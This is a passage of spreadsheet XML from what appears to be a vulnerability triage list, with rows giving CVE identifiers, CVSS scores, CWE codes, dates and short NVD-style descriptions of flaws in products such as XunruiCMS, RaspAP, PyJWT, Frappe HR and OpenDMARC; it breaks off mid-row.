          <t>CVE-2026-101018</t>
        </is>
      </c>
      <c r="D272" s="5" t="n">
        <v>4.7</v>
      </c>
      <c r="E272" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F272" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G272" s="5" t="inlineStr"/>
      <c r="H272" s="5" t="inlineStr"/>
      <c r="I272" s="5" t="inlineStr"/>
      <c r="J272" s="5" t="inlineStr">
        <is>
          <t>php, hp</t>
        </is>
      </c>
      <c r="K272" s="5" t="inlineStr"/>
      <c r="L272" s="5" t="inlineStr"/>
      <c r="M272" s="5" t="inlineStr"/>
      <c r="N272" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O272" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P272" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q272" s="5" t="inlineStr"/>
      <c r="R272" s="5" t="inlineStr">
        <is>
          <t>CWE-74, CWE-89</t>
        </is>
      </c>
      <c r="S272" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was determined in dayrui XunruiCMS up to 4.7.2. This issue affects the function group_all_edit of the file dayrui/App/Member/Controllers/Admin/Home.php of the component Group Editing. This manipulation of the argument groupid causes sql injection. The attack is possible to be carried out remotely. The exploit has been publicly disclosed and may be utilized. The vendor was contacted early about this disclosure but did not respond in any way.</t>
        </is>
      </c>
      <c r="T272" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101018</t>
        </is>
      </c>
    </row>
    <row r="273">
      <c r="A273" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B273" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C273" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101858</t>
        </is>
      </c>
      <c r="D273" s="5" t="n">
        <v>4.7</v>
      </c>
      <c r="E273" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F273" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G273" s="5" t="inlineStr"/>
      <c r="H273" s="5" t="inlineStr"/>
      <c r="I273" s="5" t="inlineStr"/>
      <c r="J273" s="5" t="inlineStr">
        <is>
          <t>php, hp</t>
        </is>
      </c>
      <c r="K273" s="5" t="inlineStr"/>
      <c r="L273" s="5" t="inlineStr"/>
      <c r="M273" s="5" t="inlineStr"/>
      <c r="N273" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O273" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="P273" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="Q273" s="5" t="inlineStr"/>
      <c r="R273" s="5" t="inlineStr">
        <is>
          <t>CWE-77, CWE-78</t>
        </is>
      </c>
      <c r="S273" s="5" t="inlineStr">
        <is>
          <t>A flaw has been found in RaspAP raspap-webgui up to 3.5.5. Affected is the function WiFiManager::writeWpaSupplicant of the file src/RaspAP/Networking/Hotspot/WiFiManager.php of the component SSID Processing. This manipulation of the argument ssid causes os command injection. The attack can be initiated remotely. The exploit has been published and may be used. The vendor was contacted early about this disclosure but did not respond in any way.</t>
        </is>
      </c>
      <c r="T273" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101858</t>
        </is>
      </c>
    </row>
    <row r="274">
      <c r="A274" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B274" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C274" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102263</t>
        </is>
      </c>
      <c r="D274" s="5" t="n">
        <v>4.7</v>
      </c>
      <c r="E274" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F274" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G274" s="5" t="inlineStr"/>
      <c r="H274" s="5" t="inlineStr"/>
      <c r="I274" s="5" t="inlineStr"/>
      <c r="J274" s="5" t="inlineStr">
        <is>
          <t>php, hp</t>
        </is>
      </c>
      <c r="K274" s="5" t="inlineStr"/>
      <c r="L274" s="5" t="inlineStr"/>
      <c r="M274" s="5" t="inlineStr"/>
      <c r="N274" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O274" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="P274" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="Q274" s="5" t="inlineStr"/>
      <c r="R274" s="5" t="inlineStr">
        <is>
          <t>CWE-284, CWE-434</t>
        </is>
      </c>
      <c r="S274" s="5" t="inlineStr">
        <is>
          <t>A vulnerability has been found in mwasikz robo-cafe-rms up to 228c44a02823f04e85db32b7137809a2856148fc. The affected element is an unknown function of the file manage-food.php. Such manipulation leads to unrestricted upload. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. This product operates on a rolling release basis, ensuring continuous delivery. Consequently, there are no version details for either affected or updated releases. The vendor was contacted early about this disclosure but did not respond in any way.</t>
        </is>
      </c>
      <c r="T274" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102263</t>
        </is>
      </c>
    </row>
    <row r="275">
      <c r="A275" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B275" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C275" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-59563</t>
        </is>
      </c>
      <c r="D275" s="5" t="n">
        <v>4.6</v>
      </c>
      <c r="E275" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F275" s="5" t="inlineStr">
        <is>
          <t>cve@zscaler.com</t>
        </is>
      </c>
      <c r="G275" s="5" t="inlineStr"/>
      <c r="H275" s="5" t="inlineStr"/>
      <c r="I275" s="5" t="inlineStr"/>
      <c r="J275" s="5" t="inlineStr">
        <is>
          <t>zscaler</t>
        </is>
      </c>
      <c r="K275" s="5" t="inlineStr"/>
      <c r="L275" s="5" t="inlineStr"/>
      <c r="M275" s="5" t="inlineStr"/>
      <c r="N275" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O275" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P275" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q275" s="5" t="inlineStr"/>
      <c r="R275" s="5" t="inlineStr">
        <is>
          <t>CWE-305</t>
        </is>
      </c>
      <c r="S275" s="5" t="inlineStr">
        <is>
          <t>Zscaler MCP Server versions 0.7.0 and 0.7.1 has an issue where HMAC confirmation tokens were not bound to the target resource identifier, allowing an MCP client or agent to replay a token generated for one resource to affect another resource of the same type. This issue is fixed in version 0.7.2.</t>
        </is>
      </c>
      <c r="T275" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-59563</t>
        </is>
      </c>
    </row>
    <row r="276">
      <c r="A276" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B276" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C276" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102270</t>
        </is>
      </c>
      <c r="D276" s="5" t="n">
        <v>4.4</v>
      </c>
      <c r="E276" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F276" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G276" s="5" t="inlineStr"/>
      <c r="H276" s="5" t="inlineStr"/>
      <c r="I276" s="5" t="inlineStr"/>
      <c r="J276" s="5" t="inlineStr">
        <is>
          <t>express, python, gin</t>
        </is>
      </c>
      <c r="K276" s="5" t="inlineStr"/>
      <c r="L276" s="5" t="inlineStr"/>
      <c r="M276" s="5" t="inlineStr"/>
      <c r="N276" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O276" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P276" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q276" s="5" t="inlineStr"/>
      <c r="R276" s="5" t="inlineStr">
        <is>
          <t>CWE-1333</t>
        </is>
      </c>
      <c r="S276" s="5" t="inlineStr">
        <is>
          <t>PyJWT is a Python implementation of JSON Web Token standards. Prior to 2.14.0, PyJWT is_pem_format is affected because lazy PEM regular expression backtracks extensively. This occurs when a certificate-like input contains repeated BEGIN markers without a matching END marker. As a result, is_pem_format performs unbounded backtracking while searching for a PEM end marker. Consequently, an attacker can cause intensive CPU consumption. This issue is fixed in version 2.14.0.</t>
        </is>
      </c>
      <c r="T276" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102270</t>
        </is>
      </c>
    </row>
    <row r="277">
      <c r="A277" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B277" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C277" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102366</t>
        </is>
      </c>
      <c r="D277" s="5" t="n">
        <v>4.4</v>
      </c>
      <c r="E277" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F277" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G277" s="5" t="inlineStr"/>
      <c r="H277" s="5" t="inlineStr"/>
      <c r="I277" s="5" t="inlineStr"/>
      <c r="J277" s="5" t="inlineStr"/>
      <c r="K277" s="5" t="inlineStr"/>
      <c r="L277" s="5" t="inlineStr"/>
      <c r="M277" s="5" t="inlineStr"/>
      <c r="N277" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O277" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="P277" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="Q277" s="5" t="inlineStr"/>
      <c r="R277" s="5" t="inlineStr">
        <is>
          <t>CWE-434</t>
        </is>
      </c>
      <c r="S277" s="5" t="inlineStr">
        <is>
          <t>mall4j through 4.0 contains an unrestricted file upload vulnerability in FileController endpoints that lack authorization checks and accept arbitrary file types without validation. Attackers with any authenticated token can upload HTML or SVG files that execute scripts in administrator browsers when accessed from the local storage path, resulting in stored cross-site scripting.</t>
        </is>
      </c>
      <c r="T277" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102366</t>
        </is>
      </c>
    </row>
    <row r="278">
      <c r="A278" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B278" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C278" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101006</t>
        </is>
      </c>
      <c r="D278" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="E278" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F278" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G278" s="5" t="inlineStr"/>
      <c r="H278" s="5" t="inlineStr"/>
      <c r="I278" s="5" t="inlineStr"/>
      <c r="J278" s="5" t="inlineStr">
        <is>
          <t>requests</t>
        </is>
      </c>
      <c r="K278" s="5" t="inlineStr"/>
      <c r="L278" s="5" t="inlineStr"/>
      <c r="M278" s="5" t="inlineStr"/>
      <c r="N278" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O278" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P278" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q278" s="5" t="inlineStr"/>
      <c r="R278" s="5" t="inlineStr">
        <is>
          <t>CWE-285, CWE-863</t>
        </is>
      </c>
      <c r="S278" s="5" t="inlineStr">
        <is>
          <t>A flaw has been found in Frappe HR up to 16.15.0. This vulnerability affects the function get_expense_claims/get_shift_requests/get_attendance_requests of the file hrms/api/__init__.py of the component Permission Validation. This manipulation of the argument employee causes incorrect authorization. Remote exploitation of the attack is possible. The vendor replied: "This issue has already been reported by another individual, and based on that, we have fixed it."</t>
        </is>
      </c>
      <c r="T278" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101006</t>
        </is>
      </c>
    </row>
    <row r="279">
      <c r="A279" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B279" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C279" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101099</t>
        </is>
      </c>
      <c r="D279" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="E279" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F279" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G279" s="5" t="inlineStr"/>
      <c r="H279" s="5" t="inlineStr"/>
      <c r="I279" s="5" t="inlineStr"/>
      <c r="J279" s="5" t="inlineStr"/>
      <c r="K279" s="5" t="inlineStr"/>
      <c r="L279" s="5" t="inlineStr"/>
      <c r="M279" s="5" t="inlineStr"/>
      <c r="N279" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O279" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P279" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q279" s="5" t="inlineStr"/>
      <c r="R279" s="5" t="inlineStr">
        <is>
          <t>CWE-755</t>
        </is>
      </c>
      <c r="S279" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was detected in ag-ui-protocol ag-ui up to 2026-09-23. This affects an unknown part of the file SseParser.kt of the component Kotlin Community SDK. Performing a manipulation results in handling of exceptional conditions. The attack may be initiated remotely. The pull request to fix this issue awaits acceptance.</t>
        </is>
      </c>
      <c r="T279" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101099</t>
        </is>
      </c>
    </row>
    <row r="280">
      <c r="A280" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B280" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C280" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101143</t>
        </is>
      </c>
      <c r="D280" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="E280" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F280" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G280" s="5" t="inlineStr"/>
      <c r="H280" s="5" t="inlineStr"/>
      <c r="I280" s="5" t="inlineStr"/>
      <c r="J280" s="5" t="inlineStr"/>
      <c r="K280" s="5" t="inlineStr"/>
      <c r="L280" s="5" t="inlineStr"/>
      <c r="M280" s="5" t="inlineStr"/>
      <c r="N280" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O280" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P280" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q280" s="5" t="inlineStr"/>
      <c r="R280" s="5" t="inlineStr">
        <is>
          <t>CWE-200, CWE-284</t>
        </is>
      </c>
      <c r="S280" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was found in Eleveo Quality Management 9.7.0. Affected by this issue is some unknown functionality of the file /qm/cz.zoom.scorecard.webui.Scorecard/cz.zoom.scorecard.webui.Scorecard/QMBODownload. The manipulation results in information disclosure. The attack may be launched remotely. The exploit has been made public and could be used. The vendor was contacted early about this disclosure but did not respond in any way.</t>
        </is>
      </c>
      <c r="T280" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101143</t>
        </is>
      </c>
    </row>
    <row r="281">
      <c r="A281" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B281" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C281" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101145</t>
        </is>
      </c>
      <c r="D281" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="E281" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F281" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G281" s="5" t="inlineStr"/>
      <c r="H281" s="5" t="inlineStr"/>
      <c r="I281" s="5" t="inlineStr"/>
      <c r="J281" s="5" t="inlineStr"/>
      <c r="K281" s="5" t="inlineStr"/>
      <c r="L281" s="5" t="inlineStr"/>
      <c r="M281" s="5" t="inlineStr"/>
      <c r="N281" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O281" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P281" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q281" s="5" t="inlineStr"/>
      <c r="R281" s="5" t="inlineStr">
        <is>
          <t>CWE-74, CWE-90</t>
        </is>
      </c>
      <c r="S281" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was identified in Eleveo Call Recording Software 9.7.0. This vulnerability affects unknown code of the file /callrec/userAddAction.do of the component User Management. Such manipulation of the argument Username leads to ldap injection. The attack can be executed remotely. The exploit is publicly available and might be used. The vendor was contacted early about this disclosure but did not respond in any way.</t>
        </is>
      </c>
      <c r="T281" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101145</t>
        </is>
      </c>
    </row>
    <row r="282">
      <c r="A282" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B282" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C282" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101146</t>
        </is>
      </c>
      <c r="D282" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="E282" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F282" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G282" s="5" t="inlineStr"/>
      <c r="H282" s="5" t="inlineStr"/>
      <c r="I282" s="5" t="inlineStr"/>
      <c r="J282" s="5" t="inlineStr"/>
      <c r="K282" s="5" t="inlineStr"/>
      <c r="L282" s="5" t="inlineStr"/>
      <c r="M282" s="5" t="inlineStr"/>
      <c r="N282" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O282" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P282" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q282" s="5" t="inlineStr"/>
      <c r="R282" s="5" t="inlineStr">
        <is>
          <t>CWE-200, CWE-284</t>
        </is>
      </c>
      <c r="S282" s="5" t="inlineStr">
        <is>
          <t>A security flaw has been discovered in Eleveo Quality Management 9.7.0. This issue affects the function UtilsService.createAndSaveAudit of the file /qm/cz.zoom.scorecard.webui.Scorecard/QMUtilsService of the component GWT RPC Handler. Performing a manipulation results in information disclosure. The attack is possible to be carried out remotely. The exploit has been released to the public and may be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way.</t>
        </is>
      </c>
      <c r="T282" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101146</t>
        </is>
      </c>
    </row>
    <row r="283">
      <c r="A283" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B283" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C283" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101278</t>
        </is>
      </c>
      <c r="D283" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="E283" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F283" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G283" s="5" t="inlineStr"/>
      <c r="H283" s="5" t="inlineStr"/>
      <c r="I283" s="5" t="inlineStr"/>
      <c r="J283" s="5" t="inlineStr">
        <is>
          <t>gin, rust</t>
        </is>
      </c>
      <c r="K283" s="5" t="inlineStr"/>
      <c r="L283" s="5" t="inlineStr"/>
      <c r="M283" s="5" t="inlineStr"/>
      <c r="N283" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O283" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="P283" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="Q283" s="5" t="inlineStr"/>
      <c r="R283" s="5" t="inlineStr">
        <is>
          <t>CWE-345, CWE-346</t>
        </is>
      </c>
      <c r="S283" s="5" t="inlineStr">
        <is>
          <t>A weakness has been identified in Trusted Domain Project OpenDMARC up to 1.4.2. This affects the function opendmarc_get_tld of the file libopendmarc/opendmarc_tld.c : of the component PSL Wildcard Handler. Executing a manipulation can lead to origin validation error. The attack may be launched remotely. The exploit has been made available to the public and could be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way.</t>
        </is>
      </c>
      <c r="T283" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101278</t>
        </is>
      </c>
    </row>
    <row r="284">
      <c r="A284" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B284" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C284" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102244</t>
        </is>
      </c>
      <c r="D284" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="E284" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F284" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G284" s="5" t="inlineStr"/>
      <c r="H284" s="5" t="inlineStr"/>
      <c r="I284" s="5" t="inlineStr"/>
      <c r="J284" s="5" t="inlineStr"/>
      <c r="K284" s="5" t="inlineStr"/>
      <c r="L284" s="5" t="inlineStr"/>
      <c r="M284" s="5" t="inlineStr"/>
      <c r="N284" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O284" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="P284" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="Q284" s="5" t="inlineStr"/>
      <c r="R284" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="S284" s="5" t="inlineStr">
        <is>
          <t>A security flaw has been discovered in MODSetter SurfSense up to 0.0.36. Impacted is an unknown function of the file surfsense_backend/app/routes/editor_routes.py of the component Document Export Feature. Performing a manipulation results in server-side request forgery. The attack can be initiated remotely. The exploit has been released to the public and may be used for attacks. Upgrading to version 0.0.36.3 is recommended to address this issue. The patch is named 2faff7b3823322a9cb6797973e6caf089386c354. The affected component should be upgraded.</t>
        </is>
      </c>
      <c r="T284" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102244</t>
        </is>
      </c>
    </row>
    <row r="285">
      <c r="A285" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B285" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C285" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102297</t>
        </is>
      </c>
      <c r="D285" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="E285" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F285" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G285" s="5" t="inlineStr"/>
      <c r="H285" s="5" t="inlineStr"/>
      <c r="I285" s="5" t="inlineStr"/>
      <c r="J285" s="5" t="inlineStr"/>
      <c r="K285" s="5" t="inlineStr"/>
      <c r="L285" s="5" t="inlineStr"/>
      <c r="M285" s="5" t="inlineStr"/>
      <c r="N285" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O285" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P285" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q285" s="5" t="inlineStr"/>
      <c r="R285" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="S285" s="5" t="inlineStr">
        <is>
          <t>ZoneMinder before 1.38.4 fails to apply per-monitor access restrictions in the FramesController index endpoint. Authenticated users with Events view permission can call the frames API to list frame records from monitors they are denied access to, disclosing event and frame metadata across monitor boundaries.</t>
        </is>
      </c>
      <c r="T285" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102297</t>
        </is>
      </c>
    </row>
    <row r="286">
      <c r="A286" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B286" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C286" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-13018</t>
        </is>
      </c>
      <c r="D286" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="E286" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F286" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G286" s="5" t="inlineStr"/>
      <c r="H286" s="5" t="inlineStr"/>
      <c r="I286" s="5" t="inlineStr"/>
      <c r="J286" s="5" t="inlineStr">
        <is>
          <t>go, rust</t>
        </is>
      </c>
      <c r="K286" s="5" t="inlineStr"/>
      <c r="L286" s="5" t="inlineStr"/>
      <c r="M286" s="5" t="inlineStr"/>
      <c r="N286" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O286" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P286" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q286" s="5" t="inlineStr"/>
      <c r="R286" s="5" t="inlineStr">
        <is>
          <t>CWE-20</t>
        </is>
      </c>
      <c r="S286" s="5" t="inlineStr">
        <is>
          <t>Insufficient validation of untrusted input in Codecs in Google Chrome prior to 147.0.7727.55 allowed a remote attacker to potentially perform out of bounds memory access via a crafted video file. (Chromium security severity: Low)</t>
        </is>
      </c>
      <c r="T286" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-13018</t>
        </is>
      </c>
    </row>
    <row r="287">
      <c r="A287" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B287" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C287" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86334</t>
        </is>
      </c>
      <c r="D287" s="5" t="n">
        <v>4.2</v>
      </c>
      <c r="E287" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F287" s="5" t="inlineStr">
        <is>
          <t>security@ubuntu.com</t>
        </is>
      </c>
      <c r="G287" s="5" t="inlineStr"/>
      <c r="H287" s="5" t="inlineStr"/>
      <c r="I287" s="5" t="inlineStr"/>
      <c r="J287" s="5" t="inlineStr"/>
      <c r="K287" s="5" t="inlineStr"/>
      <c r="L287" s="5" t="inlineStr"/>
      <c r="M287" s="5" t="inlineStr"/>
      <c r="N287" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O287" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P287" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q287" s="5" t="inlineStr"/>
      <c r="R287" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="S287" s="5" t="inlineStr">
        <is>
